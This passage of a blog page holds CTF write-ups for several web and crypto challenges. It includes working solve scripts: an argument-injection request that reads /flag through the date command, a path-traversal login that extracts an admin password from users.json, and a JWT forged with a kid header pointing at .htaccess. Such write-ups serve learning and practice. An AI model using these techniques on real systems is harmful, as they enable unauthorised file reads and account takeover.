[[],[]]</span><br><span class="line">        <span class="keyword">for</span> x <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x7f</span>):</span><br><span class="line">            <span class="keyword">if</span> crc(i, x) == j: corr[<span class="number">0</span>].append(x)</span><br><span class="line">            <span class="keyword">if</span> crc(i[::-<span class="number">1</span>], x) == j: corr[<span class="number">1</span>].append(x)</span><br><span class="line"></span><br><span class="line">        poss.append(<span class="built_in">set</span>(corr[<span class="number">0</span>]))</span><br><span class="line">    <span class="keyword">return</span> poss</span><br><span class="line"></span><br><span class="line">a = get_possible(<span class="string">&quot;./crc1.txt&quot;</span>)</span><br><span class="line">b = get_possible(<span class="string">&quot;./crc2.txt&quot;</span>)</span><br><span class="line">c = get_possible(<span class="string">&quot;./crc3.txt&quot;</span>)</span><br><span class="line"></span><br><span class="line">ok = [<span class="built_in">chr</span>((x&amp;y&amp;z).pop()) <span class="keyword">for</span> x,y,z <span class="keyword">in</span> <span class="built_in">zip</span>(a,b,c)]</span><br><span class="line"><span class="built_in">print</span>(*ok, sep=<span class="string">&#x27;&#x27;</span>)</span><br></pre></td></tr></table></figure>
<p><code>FLAG: flag&#123;did_we_detect_the_err0rs&#125;</code><br>I liked this challenge as I got the most learning from this and it was good implementing the CRC myself after reading from wikipedia.</p>
<h2 id="Challenge-16-Dr-Strange"><a href="#Challenge-16-Dr-Strange" class="headerlink" title="Challenge-16: Dr. Strange"></a>Challenge-16: Dr. Strange</h2><p>Probably my favourite challenge in the CTF.  The first thing was to understand the following exec command in php source code.</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$result</span> = <span class="title function_ invoke__">shell_exec</span>(<span class="string">&quot;date &#x27;+&quot;</span> . <span class="title function_ invoke__">escapeshellcmd</span>(<span class="variable">$format</span>) . <span class="string">&quot;&#x27; 2&gt;&amp;1&quot;</span>);</span><br></pre></td></tr></table></figure>
<p>The only parameter we could change was format and fortunately it was not being sanitized. So I was sure that I have to exploit something from here.<br>I understood that the following command runs on the server</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">date</span> +<span class="string">&#x27;&lt;format here&gt;&#x27;</span></span><br></pre></td></tr></table></figure>
<p>For a long time I kept thinking ways to execute <code>cat</code> command somehow but the <code>escapeshellcmd</code> function wouldn’t allow me to do so. So I went ahead and opened the man page of date using <code>man page</code> and see if I could print a file using this and I did. The <code>-f</code> flag can open DATEFILE and read date from it, however if the file format was not DATEFILE, it would print the contents of the file as part of the error. I got it!<br>So I carefully crafted a request to read the flag file (which btw had to be guessed where is) - turned out it was at &#x2F;flag.<br><code>format=&#39; -f /flag&#39;</code><br>I used this to first close the opening single quote, then read the file and then open the closing the single quote. I URL encoded it and sent the request to get the flag! Final request looked like this</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/?format=%27%20-f%20%2Fflag%27</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>strange.kp7b0h3vueu5g.ap-south-1.cs.amazonlightsail.com</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>4</span><br></pre></td></tr></table></figure>
<p><code>FLAG: flag&#123;1ts_t1me_t0_ge4r_up&#125;</code></p>
<h2 id="Challenge-17-Tor"><a href="#Challenge-17-Tor" class="headerlink" title="Challenge-17: Tor"></a>Challenge-17: Tor</h2><p>Again a new challenge for me, but a google search sufficed. I searched for TOR relay fingerprint search and got the official link from The TOR Project.</p>
<p><code>FLAG: flag&#123;94.130.89.176:9030&#125;</code> </p>
<h2 id="Challenge-18-Rule-Breaker"><a href="#Challenge-18-Rule-Breaker" class="headerlink" title="Challenge-18: Rule Breaker"></a>Challenge-18: Rule Breaker</h2><p>As there was not much information given I started enumerating the application for endpoints etc. I saw the session cookie and tried to decrypt it using known methods but none worked. Then I started guessing username and password and to my surprise <code>guest</code> as both username and password worked. However, I was not able to find anything useful after logging in also. Then I started searching around google for related writeups like searching for <code>Cookie session CTF</code>, <code>avatar ctf</code> etc. Then when I searched <code>Avatar Viewer CTF</code>, I got a writeup from Harekaze mini CTF 2020. Turns out it was very similiar to the one we were given. I edited their solve script for our challenge and got the flag.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> json</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&#x27;https://rule-breaker.kp7b0h3vueu5g.ap-south-1.cs.amazonlightsail.com/&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># extract admin&#x27;s password</span></span><br><span class="line">sess = requests.Session()</span><br><span class="line">sess.post(url + <span class="string">&#x27;login&#x27;</span>, headers=&#123;</span><br><span class="line">  <span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;application/json&#x27;</span></span><br><span class="line">&#125;, data=json.dumps(&#123;</span><br><span class="line">  <span class="string">&#x27;username&#x27;</span>: [<span class="string">&#x27;../users.json&#x27;</span>],</span><br><span class="line">  <span class="string">&#x27;password&#x27;</span>: <span class="literal">None</span></span><br><span class="line">&#125;))</span><br><span class="line"></span><br><span class="line">r = sess.get(url + <span class="string">&#x27;myavatar.png&#x27;</span>)</span><br><span class="line"><span class="keyword">for</span> username, password <span class="keyword">in</span> r.json().items():</span><br><span class="line">  <span class="keyword">if</span> username.startswith(<span class="string">&#x27;admin&#x27;</span>):</span><br><span class="line">    <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># log in as admin</span></span><br><span class="line">sess.post(url + <span class="string">&#x27;login&#x27;</span>, headers=&#123;</span><br><span class="line">  <span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;application/json&#x27;</span></span><br><span class="line">&#125;, data=json.dumps(&#123;</span><br><span class="line">  <span class="string">&#x27;username&#x27;</span>: [username],</span><br><span class="line">  <span class="string">&#x27;password&#x27;</span>: password</span><br><span class="line">&#125;))</span><br><span class="line"></span><br><span class="line">r = sess.get(url + <span class="string">&#x27;admin&#x27;</span>)</span><br><span class="line"><span class="built_in">print</span>(r.text)</span><br></pre></td></tr></table></figure>
<p>The printed result had the flag.<br>I did not like this challenge as it turned out to be an OSINT challenge more than a web based challenge. The solve script needed more information than we were given and there was no way to solve this without the source code.</p>
<p><code>FLAG: flag&#123;4dmin_l1k3s_c4ts&#125;</code></p>
<h2 id="Challenge-19-S3"><a href="#Challenge-19-S3" class="headerlink" title="Challenge-19: S3"></a>Challenge-19: S3</h2><p>I didn’t have much experience with S3. So I started seeing general writeups based on S3 CTF challenges. Most of them were based on configuration based errors. I created an aws account and opened the console and the following command <code>aws s3 ls intentionally-vulnerable-bucket</code>gave me the list of all files on server. Voila!<br>The endpoint <code>music_is_magic_magic_is_music.txt</code> seemed different so I went on it and got the flag.</p>
<p><code>FLAG: Flag&#123;S3S3S3S3S3S3S3S3S3S--Symmetry--3S3S3S3S3S3S3S3S3S3S3S3&#125;</code></p>
<h2 id="Challenge-20-You-vs-JWT"><a href="#Challenge-20-You-vs-JWT" class="headerlink" title="Challenge-20: You vs JWT"></a>Challenge-20: You vs JWT</h2><p>On first look I tried a lot of JWT exploits. With nothing I started bruteforcing all known exploits with jwt_tool. Still when I got nothing, I knew that it cannot be done by known exploits and used some custom implementation which could not be known without the source code. As I had already experienced the same problem in Challenge-18, I again search for similiar challenge on google and I came across another similiar challenge from the same CTF (Harekaze mini CTF 2020). I again modified the solve script and got the flag. </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> hmac</span><br><span class="line"><span class="keyword">import</span> json</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&#x27;https://jwt.kp7b0h3vueu5g.ap-south-1.cs.amazonlightsail.com/&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">b64encode</span>(<span class="params">obj</span>):</span><br><span class="line">  <span class="keyword">return</span> base64.urlsafe_b64encode(obj).replace(<span class="string">b&#x27;=&#x27;</span>, <span class="string">b&#x27;&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Generating JWT</span></span><br><span class="line">header = &#123;</span><br><span class="line">  <span class="string">&#x27;typ&#x27;</span>: <span class="string">&#x27;JWT&#x27;</span>,</span><br><span class="line">  <span class="string">&#x27;kid&#x27;</span>: <span class="string">&#x27;./.htaccess&#x27;</span>,</span><br><span class="line">  <span class="string">&#x27;alg&#x27;</span>: <span class="string">&#x27;HS256&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line">data = &#123;</span><br><span class="line">  <span class="string">&#x27;username&#x27;</span>: <span class="string">&#x27;admin&#x27;</span>,</span><br><span class="line">  <span class="string">&#x27;role&#x27;</span>: <span class="string">&#x27;admin&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line">secret = <span class="string">b&#x27;deny from all&#x27;</span></span><br><span class="line"></span><br><span class="line">signing_input = b64encode(json.dumps(header).encode()) + <span class="string">b&#x27;.&#x27;</span> + b64encode(json.dumps(data).encode())</span><br><span class="line">signature = hmac.new(secret, signing_input, hashlib.sha256).digest()</span><br><span class="line">jwt = signing_input + <span class="string">b&#x27;.&#x27;</span> + b64encode(signature)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Go!</span></span><br><span class="line">r = requests.get(url + <span class="string">&#x27;?page=admin&#x27;</span>, cookies=&#123;</span><br><span class="line">  <span class="string">&#x27;jwtsession&#x27;</span>: jwt.decode()</span><br><span class="line">&#125;)</span><br><span class="line"><span class="built_in">print</span>(r.text)</span><br></pre></td></tr></table></figure>
<p>The script used LFI which I tried and knew that default apache config files could be used. But the value inside them cannot be accessed by the user so there was no way to sign the jwt token that way. Therefore, in this challenge also, the source code or atleast some php configuration files should have been provided in order for us to know the value to be signed with. Thus this chall also turned out to be more of an OSINT chall than a web chall.</p>
<p><code>FLAG: flag&#123;so_y0u_found_m3&#125;</code></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/0xkn1gh7">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-1-Introduction"><span class="toc-number">1.</span> <span class="toc-text">Challenge-1: Introduction</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-2-Tic-Tac-Toe"><span class="toc-number">2.</span> <span class="toc-text">Challenge-2: Tic Tac Toe</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-3-Connect-4"><span class="toc-number">3.</span> <span class="toc-text">Challenge-3: Connect 4</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-4-Brute-ME"><span class="toc-number">4.</span> <span class="toc-text">Challenge-4: Brute ME</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-5-Android"><span class="toc-number">5.</span> <span class="toc-text">Challenge-5: Android</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-6-ICANN"><span class="toc-number">6.</span> <span class="toc-text">Challenge-6: ICANN</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-7-Google"><span class="toc-number">7.</span> <span class="toc-text">Challenge-7: Google</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-8-i-Robot"><span class="toc-number">8.</span> <span class="toc-text">Challenge-8: i-Robot</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-9-BrainDuck"><span class="toc-number">9.</span> <span class="toc-text">Challenge-9: BrainDuck</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-10-URL"><span class="toc-number">10.</span> <span class="toc-text">Challenge-10: URL</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-11-Country"><span class="toc-number">11.</span> <span class="toc-text">Challenge-11: Country</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-12-Maybach-Shenanigans"><span class="toc-number">12.</span> <span class="toc-text">Challenge-12: Maybach Shenanigans</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-13-QR-Code"><span class="toc-number">13.</span> <span class="toc-text">Challenge-13: QR Code</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-14-GPay-or-OpSec"><span class="toc-number">14.</span> <span class="toc-text">Challenge-14: GPay or OpSec</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-15-Confusion"><span class="toc-number">15.</span> <span class="toc-text">Challenge-15: Confusion</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-16-Dr-Strange"><span class="toc-number">16.</span> <span class="toc-text">Challenge-16: Dr. Strange</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-17-Tor"><span class="toc-number">17.</span> <span class="toc-text">Challenge-17: Tor</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-18-Rule-Breaker"><span class="toc-number">18.</span> <span class="toc-text">Challenge-18: Rule Breaker</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-19-S3"><span class="toc-number">19.</span> <span class="toc-text">Challenge-19: S3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Challenge-20-You-vs-JWT"><span class="toc-number">20.</span> <span class="toc-text">Challenge-20: You vs JWT</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/&text=Bitguard Cybersecurity Hackathon 2024 Writeups"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/&title=Bitguard Cybersecurity Hackathon 2024 Writeups"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/&is_video=false&description=Bitguard Cybersecurity Hackathon 2024 Writeups"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Bitguard Cybersecurity Hackathon 2024 Writeups&body=Check out this article: https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/&title=Bitguard Cybersecurity Hackathon 2024 Writeups"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/&title=Bitguard Cybersecurity Hackathon 2024 Writeups"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/&title=Bitguard Cybersecurity Hackathon 2024 Writeups"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/&title=Bitguard Cybersecurity Hackathon 2024 Writeups"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/&name=Bitguard Cybersecurity Hackathon 2024 Writeups&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://0xkn1gh7.github.io/2024/06/20/Bitguard-Cybersecurity-Hackathon-2024-Writeups/&t=Bitguard Cybersecurity Hackathon 2024 Writeups"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2024
    Yuval Goyal
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/0xkn1gh7">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
